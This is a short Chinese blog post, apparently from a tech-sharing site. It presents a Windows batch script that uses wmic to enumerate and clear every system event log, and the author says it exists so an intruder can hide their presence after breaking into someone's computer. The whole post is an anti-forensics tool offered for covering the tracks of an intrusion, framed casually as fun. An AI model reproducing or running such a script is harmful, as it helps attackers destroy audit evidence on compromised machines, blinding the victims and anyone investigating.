清除系统日志

想必大家都入侵过别人的电脑吧,我是入侵过,哈哈,不过我可没有破坏哦,大家想想,入侵成功,为了不让别人发现你来过,我们应该做什么呢?对,清除系统日志,所以就有了这个批处理。

 

  
  
  
  
  1. @echo off 
  2. for /f "skip=1 tokens=*" %%a in ('wmic nteventlog get filename') do call :pp %%a  
  3. goto :eof  
  4. :pp  
  5. wmic nteventlog where filename="%1" call cleareventlog  
  6. goto :eof 

让我们一起玩吧

你可能感兴趣的:(职场,bat,休闲)